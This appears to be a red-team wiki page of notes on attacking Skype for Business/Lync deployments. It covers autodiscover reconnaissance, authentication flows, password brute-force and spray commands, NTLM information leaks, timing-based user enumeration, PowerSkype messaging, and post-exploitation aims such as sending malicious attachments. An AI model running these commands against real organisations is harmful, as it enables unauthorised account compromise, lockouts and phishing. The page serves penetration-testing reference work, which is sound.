Lync - CraigDonkin/Infrastructure GitHub Wiki
Some notes on attacking Skype for Business:

- Skype for Business/Lync/Communicator
- on-premise or Online (Office 365)
## Discovery

Most organisations will have DNS records such as:

- lyncdiscover.example.org (external)
- lyncdiscoverinternal.example.org (internal)

The Skype client uses these DNS records to autodiscover the location of the server.

- A GET request to the autodiscover server returns the location you can authenticate to
- Password guessing attacks
- Response headers may also contain the internal hostname of the server
## Other Subdomains

- dialin.contoso.com
- scheduler.contoso.com
- meet.contoso.com
## Web Login Portals

- https://dialin.contoso.com
- https://lync-fe.contoso.com/dialin
- https://scheduler.contoso.com
- https://lync-fe.contoso.com/scheduler
## NMAP

Look for HTTPS services that nmap flags as `ssl/sip`; nmap should identify these as Microsoft Lync SIP.
## Authentication

- NTLM
- Kerberos
- OAuth
### NTLM + Kerberos

- Uses the WebTicketService process
- Requires retrieving the WebTicketService URL from the X-MS-WebTicketURL header, then authenticating with NTLM or Kerberos to make a SAML claim
- If successful, a security token is returned that can be used in the X-MS-WebTicket header to impersonate a user
### OAuth

- Preferred technique
- Used by LyncSniper
- OAuth cannot be disabled or removed
- The WWW-Authenticate header contains the supported authentication methods in the grant_type parameter:

  `grant_type="urn:microsoft.rtc:windows,urn:microsoft.rtc:anonmeeting,password"`

  The above shows that Windows and password authentication are supported.
- Send a POST request to the URL contained in the WWW-Authenticate header with the following parameters to authenticate:

  `grant_type="password";[email protected];password=blah`
- If successful, an access_token is returned in the JSON response.
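To check which grants a front end actually advertises (for example, whether the password grant that lockout policy and logging must cover is exposed at all), the challenge header can be parsed and summarised. This is an added example, not code from the wiki or from LyncSniper; the sample headers are constructed, `token_uri` is an assumed parameter name for the token endpoint, and the hostname is a placeholder.

```python
import re

# Constructed sample challenge headers (not captured from any real server). The
# grant_type value in the first one is the value quoted on this page; token_uri is
# an assumed parameter name for the token endpoint and the hostname a placeholder.
SAMPLE_HEADERS = {
    "onprem": (
        'Bearer trusted_issuers="", '
        'grant_type="urn:microsoft.rtc:windows,urn:microsoft.rtc:anonmeeting,password", '
        'token_uri="https://lync-fe.contoso.com/WebTicket/oauthtoken"'
    ),
    "no_password": (
        'Bearer trusted_issuers="", '
        'grant_type="urn:microsoft.rtc:windows,urn:microsoft.rtc:anonmeeting"'
    ),
}

# Match key="value" pairs rather than splitting on commas: the grant_type value
# is itself comma separated.
PARAM_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_challenge(header):
    """Return (scheme, {param: value}) for a WWW-Authenticate value."""
    scheme = header.split(" ", 1)[0]
    return scheme, dict(PARAM_RE.findall(header))


def grant_types(header):
    """Return the grant types the server advertises, in the order listed."""
    _, params = parse_challenge(header)
    return [g for g in params.get("grant_type", "").split(",") if g]


def audit_challenge(header):
    """Summarise the exposure: 'password' means the token endpoint accepts a
    plain username/password POST (the grant lockout policy and logging must
    cover); 'urn:microsoft.rtc:windows' means Windows-integrated (NTLM/Kerberos)
    credentials; 'urn:microsoft.rtc:anonmeeting' is the anonymous meeting join.
    """
    scheme, params = parse_challenge(header)
    grants = grant_types(header)
    return {
        "scheme": scheme,
        "token_uri": params.get("token_uri"),
        "password_grant": "password" in grants,
        "windows_grant": "urn:microsoft.rtc:windows" in grants,
        "anonymous_meeting_grant": "urn:microsoft.rtc:anonmeeting" in grants,
    }
```

Feed it the real WWW-Authenticate value from an unauthenticated request to the front end; the Office 365 case described below should never report `password_grant` as true.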
### Office 365 OAuth

- grant_type password is not supported
- Authentication is performed using Windows Live authentication
- The autodiscover service will respond with a host of https://webdir*.online.lync.com
- Authentication is performed to a static endpoint using WS-Trust and RST
## Attacks

### Password Brute Force

- Can lock out accounts
- On-premise, lockout depends on the AD account lockout policy
- In the cloud, lockout is controlled by Microsoft
  - 10 attempts lockout
  - Increased lockout duration

```
Invoke-LyncBrute -username [email protected] -passlist blah.list -office365 -verbose
```
### Password Spray

```
Invoke-LyncSpray -userlist users.txt -password Blah -AutoDiscoverURL https://lyncdiscover.blah.org -verbose
```
### Information Disclosure via NTLM

- NTLM may be enabled on directories such as:
  - /abs
  - /WebTicket/WebTicketService.svc
  - /WebTicket/
  - /GroupExpansion
  - /CertProv
  - /RgsClients
  - /RequestHandlerEXT
  - /mcx
- Run:

```
nmap -v -Pn -sS -p443 --script=http-ntlm-info --script-args=http-ntlm-info.root=/abs/ dialin.contoso.com
```
### User Enumeration Timing Attack

- A login attempt with a VALID username responds faster than one with an INVALID username or domain

```
python lyncsmash.py enum -H 2013-lync-fe.contoso.com -U userlist.txt -p password -d CONTOSO
```

This causes one failed login attempt for every valid username.
## Tools

- https://github.com/mdsecresearch/LyncSniper
- https://github.com/nyxgeek/lyncsmash
- https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1
### PowerSkype

Validate an email and get its status:

```
Get-SkypeStatus -email [email protected]
```

Validate emails and get statuses (list input):

```
Get-SkypeStatus -inputFile emails.txt | ft -auto
```

Send a message:

```
Invoke-SendSkypeMessage -email [email protected] -message "Hello World"
```

Send a message to multiple users:

```
get-content emails.txt | foreach {Invoke-SendSkypeMessage -email $_ -message "Hello World"}
```
## Post Exploitation

- Obtain global address book
- Enumerate employee relationships
- Social engineer users
- Send malicious attachments
- Monitor targets via user presence
## References

- https://www.trustedsec.com/2017/08/attacking-self-hosted-skype-businessmicrosoft-lync-installations/
- https://www.mdsec.co.uk/2017/04/penetration-testing-skype-for-business-exploiting-the-missing-lync/
- https://blog.netspi.com/attacking-federated-skype-powershell/